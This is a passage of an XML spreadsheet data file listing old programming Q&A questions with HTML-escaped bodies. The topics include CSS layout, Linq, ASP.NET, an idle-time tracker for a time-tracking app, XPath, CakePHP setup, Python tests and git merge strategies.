Here is the relevant CSS and HTML.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#header {
    height: 42px;
}
#logo {
    width: 253px;
    height: 42px;
    background-image:url(logo.png);
    float: left;
}
#nav {
    width: 100%;
    border-bottom: 2px solid #3edff2;
    vertical-align: bottom;
}
#nav ul {
    list-style-type: none;
    margin: 0;
    padding: 0;
    margin-bottom: 4px;
    text-align: right;
    font-size: 1.25em;
}
#nav ul li {
    display: inline;
    background-color: #3edff2;
    padding: 5px;
}
    &amp;lt;div id="header"&amp;gt;
        &amp;lt;div id="logo"&amp;gt;&amp;lt;a href="/"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;
        &amp;lt;div id="nav"&amp;gt;
            &amp;lt;ul&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="#"&amp;gt;*****&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
                            [...]
            &amp;lt;/ul&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq 2 SQL or Linq Entities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am starting to design a new application and what I am wondering is peoples opinions on Linq2SQL or Linq2Entities and what they feel is the better technology for rapid development.&lt;/p&gt;
&lt;p&gt;I am also doing some research into ADO.net data services.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ROR: To scaffold or not?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I love scaffolding and it extremely helpful for prototyping. But Should we use scaffolding for developing application as such?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to save history within UpdatePanel?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created an admin page for a web application, and it's mostly ajax. Almost all the events in the page update one of the UpdatePanels on the page.
How can I save each UpdatePanel state in the user's history so when the user pushes the browser "back" button they wont get redirected to the login screen ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between a Postback and a Callback</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I keep on hearing this words '&lt;strong&gt;callback&lt;/strong&gt;' and '&lt;strong&gt;postback&lt;/strong&gt;' tossed around.&lt;br /&gt;
What is the difference between two ? &lt;/p&gt;
&lt;p&gt;Is postback very specific to the ASP.NET pages ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross platform keylogger</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for ways to watch mouse and keyboard events on Windows, Linux and Mac from Python.&lt;/p&gt;
&lt;p&gt;My application is a time tracker. I'm not looking into the event, I just record the time when it happens. If there are no events for a certain time, say 10 minutes, I assume that the user has left and stop the current project.&lt;/p&gt;
&lt;p&gt;When the user returns (events come in again), I wait a moment (so this doesn't get triggered by the cleaning crew or your pets or an earthquake). If the events persist over a longer period of time, I assume that the user has returned and I pop up a small, inactive window where she can choose to add the time interval to "break", the current project (meeting, etc) or a different project.&lt;/p&gt;
&lt;p&gt;I've solved the keylogger for Windows using the &lt;a href="http://sourceforge.net/projects/pyhook/"&gt;pyHook&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;On Linux, I have found a solution but I don't like it: I can watch all device nodes in /etc/input and update a timestamp somewhere in /var or /tmp every time I see an event. There are two drawbacks: 1. I can't tell whether the event if from the user who is running the time tracker and 2. this little program needs to be run as root (not good).&lt;/p&gt;
&lt;p&gt;On Mac, I have no idea, yet.&lt;/p&gt;
&lt;p&gt;Questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Is there a better way to know whether the user is creating events than watching the event devices on Linux?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Any pointers how to do that on a Mac?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Proper way to stop TcpListener</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently using TcpListener to address incoming connections, each of which are given a thread for handling the communication and then shutdown that single connection. Code looks as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TcpListener listener = new TcpListener(IPAddress.Any, Port);
System.Console.WriteLine("Server Initialized, listening for incoming connections");
listener.Start();
while (listen)
{
     // Step 0: Client connection
     TcpClient client = listener.AcceptTcpClient();
     Thread clientThread = new Thread(new ParameterizedThreadStart(HandleConnection));
     clientThread.Start(client.GetStream());
     client.Close();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;listen&lt;/code&gt; variable is a boolean that is a field on the class. Now, when the program shuts down I want it to stop listening for clients. Setting listen to &lt;code&gt;false&lt;/code&gt; will prevent it from taking on more connections, but since &lt;code&gt;AcceptTcpClient&lt;/code&gt; is a blocking call, it will at minimum take the next client and THEN exit. Is there any way to force it to simply break out and stop, right then and there? What effect does calling listener.Stop() have while the other blocking call is running?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Large primary key: 1+ billion rows MySQL + InnoDB?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if InnoDB would be the best way to format the table? The table contains one field, primary key, and the table will get 816k rows a day (est.). This will get very large very quick! I'm working on a file storage way (would this be faster)? The table is going to store ID numbers of Twitter Ids that have already been processed?&lt;/p&gt;
&lt;p&gt;Also, any estimated memory usage on a &lt;code&gt;SELECT min('id')&lt;/code&gt; statement? Any other ideas are greatly appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>select the &lt;select&gt; tag options using value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to select an option in select tag through the value.  - javascript&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var selectbox=document.getElementById("Lstrtemplate");
var TemplateName=selectbox.options[selectbox.selectedIndex].text;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now i am having the option text in TemplateName, using this i want to update an another select tag, which is having the same text.. &lt;/p&gt;
&lt;p&gt;But dont want to use index or id.. &lt;/p&gt;
&lt;p&gt;Want to achieve only by the value&lt;/p&gt;
&lt;p&gt;Please help me&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to do streaming WiFi Communications on the iPhone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to develop an iPhone application that will require point-to-point WiFi communications on an iPhone.  I would like to use the WiFi interface and have the application stream between the phone and a WiFi device.  Does anyone have some experience with this?  Is it even possible?  I know there is a discovery application but I am looking for something a little more robust.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Smart navigation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is smart navigation in .NET? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio skips build</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try to build my project I get the following message in the build window :&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;========== Build: 0 succeeded or up-to-date, 0 failed, 1 skipped ==========&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I tried rebuilding , then building again , but it doesn't help . Is there a way to view more detailed messages ? The "skipped" part doesn't give me any info on what's wrong . I am using Visual Studio 2005 Professional Edition .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Xpath sibling conditional testing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using VB.net (2003), and calling the SelectNodes method on an xml document.&lt;br&gt;
If I have a document:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;InqRs&amp;gt;  
  &amp;lt;DetRs&amp;gt;  
    &amp;lt;RefInfo&amp;gt;  
      &amp;lt;RefType&amp;gt;StopNum&amp;lt;/RefType&amp;gt;  
      &amp;lt;RefId&amp;gt;0&amp;lt;/RefId&amp;gt;  
    &amp;lt;/RefInfo&amp;gt;  
    &amp;lt;RefInfo&amp;gt;  
      &amp;lt;RefType&amp;gt;Id&amp;lt;/RefType&amp;gt;  
      &amp;lt;RefId&amp;gt;0&amp;lt;/RefId&amp;gt;  
    &amp;lt;/RefInfo&amp;gt;  
  &amp;lt;/DetRs&amp;gt;  
  &amp;lt;DetRs&amp;gt;  
    &amp;lt;RefInfo&amp;gt;  
      &amp;lt;RefType&amp;gt;StopNum&amp;lt;/RefType&amp;gt;  
      &amp;lt;RefId&amp;gt;0&amp;lt;/RefId&amp;gt;  
    &amp;lt;/RefInfo&amp;gt;  
    &amp;lt;RefInfo&amp;gt;  
      &amp;lt;RefType&amp;gt;Id&amp;lt;/RefType&amp;gt;  
      &amp;lt;RefId&amp;gt;1&amp;lt;/RefId&amp;gt;  
    &amp;lt;/RefInfo&amp;gt;  
  &amp;lt;/DetRs&amp;gt;  
&amp;lt;/InqRs&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I select just for the &lt;code&gt;DetRs&lt;/code&gt; that has &lt;code&gt;RefType=Id&lt;/code&gt; and &lt;code&gt;RefId=0&lt;/code&gt;, ie, the 'first' one above?&lt;/p&gt;
&lt;p&gt;I've tried several different attempts, among others:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;InqRs/DetRs[RefInfo/RefType='Id' and RefInfo/RefId='0']  
InqRs/DetRs[RefInfo/RefType='Id'][RefInfo/RefId='0']  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But these select both of the DetRs sections (because of the StopNum 
RefId of 0, I presume). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How could I implement this strange WPF TreeListDataGridView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As you can see in the image below I have a tree datamodel consisting of groups that can contain other groups plus an arbitary number of items wich again can hold Parameters. The Parameters itself are defined globally and just reoccur in the items. Only the parameter's actual value may differ from parameter usage to parameter usage in the different items.&lt;/p&gt;
&lt;p&gt;The image below is an ordinary WPF treeview control with a custom control template and datatemplates for the items.&lt;/p&gt;
&lt;p&gt;Now my goal is to remove the parameter names above the textboxes and stack them vertically in a separate column at the very left of the treeview and just leave the textboxes there but also stacked vertically so they the correspond with their parameter names in the first column.&lt;/p&gt;
&lt;p&gt;Is there a way I can solve this with control templates and data templates and databinding to the view model ? (Yes I use MVVM)&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img242.imageshack.us/img242/5377/treebh8.th.png" alt="treeview image" /&gt;
&lt;a href="http://img242.imageshack.us/img242/5377/treebh8.png" rel="nofollow"&gt;image link&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The problem is a general layout problem that must work well with databinding. generally I want to bind the object graph to a view that somewhat looks like this (cutout mockup):&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img75.imageshack.us/img75/5763/treelayoutjh5.jpg" alt="treelayout" /&gt;&lt;/p&gt;
&lt;p&gt;Note that the ParamX headers are not really part of the treelayout anymore. But the values still are. Now the values must keep a connection (i.e. the are on the same row) with them. Also if none of the items in the tree contain for example Param1 the Param1 header and the corresponding row must completely dissappear.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Howto rotate image using jquery rotate plugin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you rotate an image using &lt;a href="http://code.google.com/p/jquery-rotate/" rel="nofollow"&gt;jQuery-rotate&lt;/a&gt; plugin?&lt;/p&gt;
&lt;p&gt;I have tried the following and it doesn't seem to work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&amp;gt;
&amp;lt;title&amp;gt;View Photo&amp;lt;/title&amp;gt;
&amp;lt;script type="text/javascript" src="scripts/jquery.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script type="text/javascript" src="scripts/jquery.rotate.1-1.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script type="text/javascript"&amp;gt;
var angle = 0;
setInterval ( function (e) {
    rotate();
}, 100 );
function rotate() {
    angle = angle + 1;
    $('#pic').rotate(angle);
}
&amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;img border="0" src="player.gif" name="pic" id="pic"&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Other methods that are supported by most browsers are wanted too, thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Android development with Netbeans IDE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody had any success with developing for Android platform using Netbeans (5.5+ ) IDE? I know of atleast netbeans one plugin that is supposed to support it but wanted to hear if anyone is using netbeans for Android development and how easy it is to set it up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I have one class for every database I use?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First, let me explain what I am doing. I need to take an order, which is split up into different databases, and print out this very large order. What I need from the orders is about 100 or so columns from different databases. The way I was doing in was querying with a join and assigning all of the column values to a variable in my one large Order class. This has started to become troublesome. I am wondering of instead of having one class that is comprised of 100 or so members that make up the order. Should I have just one class for every database I use, and then work with that?&lt;/p&gt;
&lt;p&gt;Let me add to this. Basically, is it better to map you objects to the original database tables, or the result set. Because I have my object mapped to the result set and not the individual tables.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make Eclipse CDT auto-indent properly when using BOOST_FOREACH?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I write this tiny C++ example in Eclipse 3.4.1 (CDT 5.0.1):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;vector&amp;gt;
#include &amp;lt;boost/foreach.hpp&amp;gt;
int foo()
{
  std::vector&amp;lt;int&amp;gt; numbers;
  BOOST_FOREACH(int n, numbers)
  {
    std::cout &amp;lt;&amp;lt; n &amp;lt;&amp;lt; std::endl;
  }
  std::cout &amp;lt;&amp;lt; numbers.size &amp;lt;&amp;lt; std::endl;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I hit Shift+Ctrl+F to format my code, and it becomes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;vector&amp;gt;
#include &amp;lt;boost/foreach.hpp&amp;gt;
int foo()
{
    std::vector&amp;lt;int&amp;gt; numbers;
    BOOST_FOREACH(int n, numbers)
{   std::cout &amp;lt;&amp;lt; n &amp;lt;&amp;lt; std::endl;
}
std::cout &amp;lt;&amp;lt; numbers.size &amp;lt;&amp;lt; std::endl;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is with the BSD/Allman Code Style. Other styles obviously vary the look of the formatted code, but none give correct indentation.&lt;/p&gt;
&lt;p&gt;When I use the format feature on a larger piece of code, subsequent functions or methods are also affected by too little indentation, making the formatting help pretty unhelpful.&lt;/p&gt;
&lt;p&gt;Is there something I can do to make the indentation work properly with BOOST_FOREACH?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get CakePHP bake to find mysql.sock and recognize MySQL while using MAMP on Mac OSX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently reading "Beginning CakePHP:From Novice to Professional" by David Golding. At one point I have to use the CLI-command "cake bake", I get the welcome-screen but when I try to bake e.g. a Controller I get the following error messages:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Warning: mysql_connect(): Can't connect to local MySQL server through socket '/var/mysql/mysql.sock' (2) in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 117
Warning: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 122
Warning: mysql_get_server_info(): supplied argument is not a valid MySQL-Link resource in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 130
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 154
Error: Your database does not have any tables.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I suspect that the error-messages has to do with php trying to access the wrong mysql-socket, namely the default osx mysql-socket - instead of the one that MAMP uses. Hence I change my database configurations to connect to the UNIX mysql-socket (:/Applications/MAMP/tmp/mysql/mysql.sock):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class DATABASE_CONFIG {
    var $default = array(
        'driver' =&amp;gt; 'mysql',
        'connect' =&amp;gt; 'mysql_connect',
        'persistent' =&amp;gt; false,
        'host' =&amp;gt;':/Applications/MAMP/tmp/mysql/mysql.sock', // UNIX MySQL-socket
        'login' =&amp;gt; 'my_user',
        'password' =&amp;gt; 'my_pass',
        'database' =&amp;gt; 'blog',
        'prefix' =&amp;gt; '',
    );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get the same error-messages with the new socket:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Warning: mysql_connect(): Can't connect to local MySQL server through socket '/Applications/MAMP/tmp/mysql/mysql.sock:3306' (2) in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 117
Warning: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 122
Warning: mysql_get_server_info(): supplied argument is not a valid MySQL-Link resource in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 130
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /Applications/MAMP/htdocs/blog/cake/libs/model/datasources/dbo/dbo_mysql.php on line 154
Error: Your database does not have any tables.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, even though I use the UNIX-socket that MAMP show on it's welcome-screen, CakePHP loses the database-connection, when using this socket instead of localhost.&lt;/p&gt;
&lt;p&gt;Any ideas on how I can get bake to work?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;-- Edit 1 --&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thank you guys for helping me out! :)&lt;/p&gt;
&lt;p&gt;I have a problem figuring out where in my.cnf to edit to get MySQL to listen to TCP/IP request. The only paragraph I can find where TCP/IP is mentioned is the following: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Don't listen on a TCP/IP port at all. This can be a security enhancement,
# if all processes that need to connect to mysqld run on the same host.
# All interaction with mysqld must be made via Unix sockets or named pipes.
# Note that using this option without enabling named pipes on Windows
# (via the "enable-named-pipe" option) will render mysqld useless!
# 
#skip-networking
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That allows me to turn off TCP/IP completely, which is the opposite of my intention. I don't know how to go about what you suggest, if you could be more elaborate it would be great. I am a total n00b on these matters :S&lt;/p&gt;
&lt;p&gt;Reg. connecting to a local socket: I removed the leading colon in the host-parameter, same result.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to organize python test in a way that I can run all tests in a single command?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently my code is organized in the following tree structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;src/
    module1.py
    module2.py
    test_module1.py
    test_module2.py
    subpackage1/
        __init__.py
        moduleA.py
        moduleB.py
        test_moduleA.py
        test_moduleB.py
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where the &lt;code&gt;module*.py&lt;/code&gt; files contains the source code and the &lt;code&gt;test_module*.py&lt;/code&gt; contains the &lt;code&gt;TestCase&lt;/code&gt;s for the relevant module.&lt;/p&gt;
&lt;p&gt;With the following comands I can run the tests contained in a single file, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cd src
$ nosetests test_filesystem.py
..................
----------------------------------------------------------------------
Ran 18 tests in 0.390s
OK
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I run all tests? I tried with &lt;code&gt;nosetests -m 'test_.*'&lt;/code&gt; but it doesn't work.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$cd src
$ nosetests -m 'test_.*'
----------------------------------------------------------------------
Ran 0 tests in 0.000s
OK
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When would you use the different git merge strategies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From the man page on git-merge, there are a number of merge strategies you can use.  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;resolve&lt;/em&gt; - 
This can only resolve two heads (i.e. the current branch and another branch you pulled from) using 3-way merge algorithm. It tries to carefully detect criss-cross merge ambiguities and is considered generally safe and fast.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;recursive&lt;/em&gt; - 
This can only resolve two heads using 3-way merge algorithm. When there are more than one common ancestors that can be used for 3-way merge, it creates a merged tree of the common ancestors and uses that as the reference tree for the 3-way merge. This has been reported to result in fewer merge conflicts without causing mis-merges by tests done on actual merge commits taken from Linux 2.6 kernel development history. Additionally this can detect and handle merges involving renames. This is the default merge strategy when pulling or merging one branch.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;octopus&lt;/em&gt; - 
This resolves more than two-head case, but refuses to do complex merge that needs manual resolution. It is primarily meant to be used for bundling topic branch heads together. This is the default merge strategy when pulling or merging more than one branches.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;ours&lt;/em&gt; - 
This resolves any number of heads, but the result of the merge is always the current branch head. It is meant to be used to supersede old development history of side branches.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;subtree&lt;/em&gt; - 
This is a modified recursive strategy. When merging trees A and B, if B corresponds to a subtree of A, B is first adjusted to match the tree structure of A, instead of reading the trees at the same level. This adjustment is also done to the common ancestor tree.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When should I specify something different than the default?  What scenarios are each best for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the differences between Perl, Python, AWK and sed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;just want to know what are the main differences among them? and the power of each language (where it's better to use it).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; it's not "vs." like topic, just information.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to animate background image sliding left?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to animate a background image sliding to the left, and looping it? Say I've got a progress bar with a background I want to animate when it's active (like in Gnome or OS X).&lt;/p&gt;
&lt;p&gt;I've been playing with the $(...).animate() function and trying to to modify the relevant CSS property, but I keep hitting a brick wall when trying to figure out how to modify the background-position property. I can't just increment its value, and I'm not sure if this is even the best approach.&lt;/p&gt;
&lt;p&gt;Any help appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Descendant Enumeration in Objective-C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to get a list of all descendant classes of a particular class in objective-c?&lt;/p&gt;
&lt;p&gt;Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  @interface A : NSObject
  @end
  @interface B : A
  @end
  @interface C : A
  @end
  NSArray *descendants = [A allDescendants];  // descendants = [B, C]
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Using Matlab, how can I find the value K in the following root locus?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Matlab, how can I find value of K, in a system that has oscillation?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;(system's tf, if needed:  (K * (s +
  25))/(s^3 + 24 s^2 + 100 s) )&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;PS. I'm using root locus.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Title (in ASP.NET @ Page directive) not rendering in web page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was intending on use the Title attribute in the @Page directive to customise each pages title, but it simply doesn't appear to do anything.&lt;/p&gt;
&lt;p&gt;The site uses master pages - I don't know if that is a consideration.&lt;/p&gt;
&lt;p&gt;Master Page snippet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Master Language="VB" CodeFile="brightnorth.master.vb" Inherits="brightnorth" %&amp;gt;
&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /&amp;gt;
    &amp;lt;link rel="stylesheet" type="text/css" href="/css/style.css" /&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
etc....
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Page snippet (from &lt;a href="http://www.brightnorth.com/about/aboutus.aspx" rel="nofollow"&gt;http://www.brightnorth.com/about/aboutus.aspx&lt;/a&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Page Language="VB" MasterPageFile="~/brightnorth.master" AutoEventWireup="false" CodeFile="aboutus.aspx.vb" Inherits="about_aboutus" Title="Brightnorth.com: About Us" %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is more, if I run the page through the &lt;a href="http://validator.w3.org/check?verbose=1&amp;amp;uri=http%3A%2F%2Fwww.brightnorth.com%2Fabout%2Faboutus.aspx" rel="nofollow"&gt;validator&lt;/a&gt;, it complains about... &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;end tag for "head" which is not finished&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;..whereas the the  tag &lt;em&gt;is&lt;/em&gt; present in the source code.&lt;/p&gt;
&lt;p&gt;I've already got a workaround in place, but it's annoying the hell out of me, so I'm determined to find a resolution!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I want to assign a record to TStringList.Objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want create a Playlist control. I have a lot of information to display into a TStringList. I want to assign a record to TStringGrid.Objects instead of an object because so many objects may take a while to create/destroy. It also take a lot of RAM.&lt;/p&gt;
&lt;p&gt;A record will be much faster and slim. 
How can I do that?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TYPE
 AMyRec= packed record
        FullName     : string[255];    
        RelativePath : boolean;        
        IsInvalid    : boolean;        
        InCache      : boolean;        
        etc
       end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it safe to run a pool under NT AUTHORITY\NETWORK SERVICE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I normally would create a limited rights user and run the process under that but the fact that pools automatically created under IIS7 in 2008 use this account makes me think that this is perfectly safe, and possibly more so than something I create? The whole Secure By Default push from Redmond would lead me to believe this is the case.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I kill an unruly spid in Sybase?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a couple of rogue spid's in my database that I can see are sleeping when I log in as &lt;code&gt;sa&lt;/code&gt; and use &lt;code&gt;sp_who&lt;/code&gt;, but attempts to use &lt;code&gt;kill &amp;lt;spid&amp;gt;&lt;/code&gt; to eliminate them have failed and I don't actually have access to the server itself to bounce it. Is there any other way of killing these things off?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Memory Allocation Failure Recovery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an embedded processor (400 MHz Intel PXA255 XScale), and I thought I saw one case where there wasn't enough memory to satisfy a 'new' operation. The program didn't crash, so I assumed other threads had freed their memory and it was just a transient thing.  This is some pretty critical code, so exiting is not an option, and some sort of error needs to be returned to the remote user.&lt;/p&gt;
&lt;p&gt;Would the following small fix be enough to solve the problem, or is there a better way? Before replacing every 'new' with the following code, I thought I'd ask.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char someArr[];
do{ 
    someArr = new char[10]; 
    Sleep(100); // no justification for choosing 100 ms
} while ( someArr == NULL );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does the Sleep help? Should I set some max number of retries?  Is it possible to use static initialization everywhere?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FINAL UPDATE:&lt;/strong&gt; Thank you very much for the helpful responses, but it turns out there was an error in the code checking for failed memory allocation.  I will keep all of these answers in mind, and replace as many malloc's and new's as I can, though (especially in error-handling code).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>late static binding: which languages commonly used for web development support it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lately I've been seeing a lot of talk regarding PHP's lack of late static binding until 5.3. &lt;/p&gt;
&lt;p&gt;From what I've read proper implementations of stuff like ActiveRecord are not possible until the language has this feature.&lt;/p&gt;
&lt;p&gt;So, I'm curious about:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Which languages do support it,
specifically those commonly
associated with web development such
as Python, Ruby, Perl, Java, C#,
(JavaScript?).&lt;/li&gt;
&lt;li&gt;Which actually make use of it on a
regular basis?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Associative array without toString, etc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create an associative array:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var aa = {} //equivalent to Object(), new Object(), etc...
&lt;/code&gt;&lt;/pre&gt;
